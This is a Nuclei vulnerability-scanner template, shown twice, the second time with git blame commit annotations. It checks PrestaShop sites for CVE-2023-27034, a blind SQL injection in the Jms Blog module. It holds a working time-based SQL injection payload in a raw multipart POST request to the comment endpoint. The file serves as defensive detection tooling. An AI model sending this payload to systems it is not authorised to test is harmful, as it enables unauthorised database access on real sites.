nuclei-templates/http/cves/2023/CVE-2023-27034.yaml

id: CVE-2023-27034

info:
  name: Blind SQL injection vulnerability in Jms Blog
  author: MaStErChO
  severity: critical
  description: |
    The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034
    - https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html
    - https://github.com/advisories/GHSA-7jr7-v6gv-m656
    - https://friends-of-presta.github.io/security-advisories/modules/2023/03/13/jmsblog.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27034
    cwe-id: CWE-89
    epss-score: 0.00572
    cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:*
    epss-percentile: 0.75071
  metadata:
    max-request: 2
    framework: prestashop
    vendor: joommasters
    product: jms_blog
  tags: cve,cve2023,prestashop,prestashop-module,sqli,intrusive

http:
  - raw:
      - |
        @timeout: 12s
        POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1
        Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}
        Host: {{Hostname}}
        Connection: Keep-alive

        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="comment"

        555
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="customer_name"


        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="email"

        0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="post_id"

        1
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="post_id_comment_reply"

        1
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="submitComment"

        submitComment=
        ------------YWJkMTQzNDcw--
      - |
        GET /modules/jmsblog/config.xml HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'contains(body_2, "Jms Blog")'
        condition: and
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`id: CVE-2023-27034`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`info:`
			`name: Blind SQL injection vulnerability in Jms Blog`
			`author: MaStErChO`
			`severity: critical`
			`description: \|`
Fixed matchers and removed statuscode check as not always is 200 2023-08-25 13:17:54 +00:00			`The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes`
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`reference:`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034`
			`- https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html`
			`- https://github.com/advisories/GHSA-7jr7-v6gv-m656`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`- https://friends-of-presta.github.io/security-advisories/modules/2023/03/13/jmsblog.html`
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2023-27034`
			`cwe-id: CWE-89`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-score: 0.00572`
			`cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:::::prestashop::`
			`epss-percentile: 0.75071`
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`metadata:`
TemplateMan Update [Fri Aug 25 14:08:39 UTC 2023] :robot: 2023-08-25 14:08:39 +00:00			`max-request: 2`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`framework: prestashop`
			`vendor: joommasters`
			`product: jms_blog`
			`tags: cve,cve2023,prestashop,prestashop-module,sqli,intrusive`
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00
			`http:`
			`- raw:`
			`- \|`
Fixed matchers and removed statuscode check as not always is 200 2023-08-25 13:17:54 +00:00			`@timeout: 12s`
			`POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1`
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw`
			`X-Requested-With: XMLHttpRequest`
Fixed matchers and removed statuscode check as not always is 200 2023-08-25 13:17:54 +00:00			`Referer: {{RootURL}}`
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`Host: {{Hostname}}`
			`Connection: Keep-alive`
fixed trailing spaces 2023-08-25 12:34:57 +00:00
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`------------YWJkMTQzNDcw`
			`Content-Disposition: form-data; name="comment"`

			`555`
			`------------YWJkMTQzNDcw`
			`Content-Disposition: form-data; name="customer_name"`


			`------------YWJkMTQzNDcw`
			`Content-Disposition: form-data; name="email"`

			`0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z`
			`------------YWJkMTQzNDcw`
			`Content-Disposition: form-data; name="post_id"`

Fixed matchers and removed statuscode check as not always is 200 2023-08-25 13:17:54 +00:00			`1`
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`------------YWJkMTQzNDcw`
			`Content-Disposition: form-data; name="post_id_comment_reply"`

			`1`
			`------------YWJkMTQzNDcw`
			`Content-Disposition: form-data; name="submitComment"`

			`submitComment=`
			`------------YWJkMTQzNDcw--`
Fixed matchers and removed statuscode check as not always is 200 2023-08-25 13:17:54 +00:00			`- \|`
			`GET /modules/jmsblog/config.xml HTTP/1.1`
			`Host: {{Hostname}}`
Fix trailing space 2023-08-25 13:25:02 +00:00
Updated condition 2023-08-25 14:00:49 +00:00			`stop-at-first-match: true`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00
Fixed naming of apmarketplace, fixed old CVE from medium to lowand added another sqli prestashop 2023-08-18 23:19:47 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
Updated condition 2023-08-25 14:00:49 +00:00			`- 'duration_1>=6'`
			`- 'contains(body_2, "Jms Blog")'`
			`condition: and`